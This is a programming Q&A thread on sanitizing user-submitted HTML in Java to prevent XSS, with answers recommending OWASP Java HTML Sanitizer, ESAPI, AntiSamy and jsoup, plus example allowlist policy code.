How to sanitize HTML code in Java to prevent XSS attacks?

Question

I\'m looking for class/util etc. to sanitize HTML code i.e. remove dangerous tags, attributes and values to avoid XSS and similar attacks.

I get html code from rich

Answer 1

You can try OWASP Java HTML Sanitizer. It is very simple to use.

PolicyFactory policy = new HtmlPolicyBuilder()
    .allowElements("a")
    .allowUrlProtocols("https")
    .allowAttributes("href").onElements("a")
    .requireRelNofollowOnLinks()
    .build();

String safeHTML = policy.sanitize(untrustedHTML);

Answer 2

You could use OWASP ESAPI for Java, which is a security library that is built to do such operations.

Not only does it have encoders for HTML, it also has encoders to perform JavaScript, CSS and URL encoding. Sample uses of ESAPI can be found in the XSS prevention cheatsheet published by OWASP.

You could use the OWASP AntiSamy project to define a site policy that states what is allowed in user-submitted content. The site policy can be later used to obtain "clean" HTML that is displayed back. You can find a sample TinyMCE policy file on the AntiSamy downloads page.

Answer 3

HTML escaping inputs works very well. But in some cases business rules might require you NOT to escape the HTML. Using REGEX is not fit for the task and it is too hard to come up with a good solution using it.

The best solution I found was to use: http://jsoup.org/cookbook/cleaning-html/whitelist-sanitizer

It builds a DOM tree with the provided input and filters any element not previosly allowed by a Whitelist. The API also has other functions for cleaning up html.

And it can also be used with javax.validation @SafeHtml(whitelistType=, additionalTags=)

Answer 4

Regarding Antisamy, you may want to check this regarding the dependencies:

http://code.google.com/p/owaspantisamy/issues/detail?id=95&can=1&q=redyetidave

Answer 5

Thanks to @Saljack's answer. Just to elaborate more to OWASP Java HTML Sanitizer. It worked out really well (quick) for me. I just added the following to the pom.xml in my Maven project:

    <dependency>
        <groupId>com.googlecode.owasp-java-html-sanitizer</groupId>
        <artifactId>owasp-java-html-sanitizer</artifactId>
        <version>20150501.1</version>
    </dependency>

Check here for latest release.

Then I added this function for sanitization:

    private String sanitizeHTML(String untrustedHTML){
        PolicyFactory policy = new HtmlPolicyBuilder()
            .allowAttributes("src").onElements("img")
            .allowAttributes("href").onElements("a")
            .allowStandardUrlProtocols()
            .allowElements(
            "a", "img"
            ).toFactory();

        return policy.sanitize(untrustedHTML); 
    }

More tags can be added by extending the comma delimited parameter in allowElements method.

Just add this line prior passing the bean off to save the data:

    bean.setHtml(sanitizeHTML(bean.getHtml()));

That's it!

For more complex logic, this library is very flexible and it can handle more sophisticated sanitizing implementation.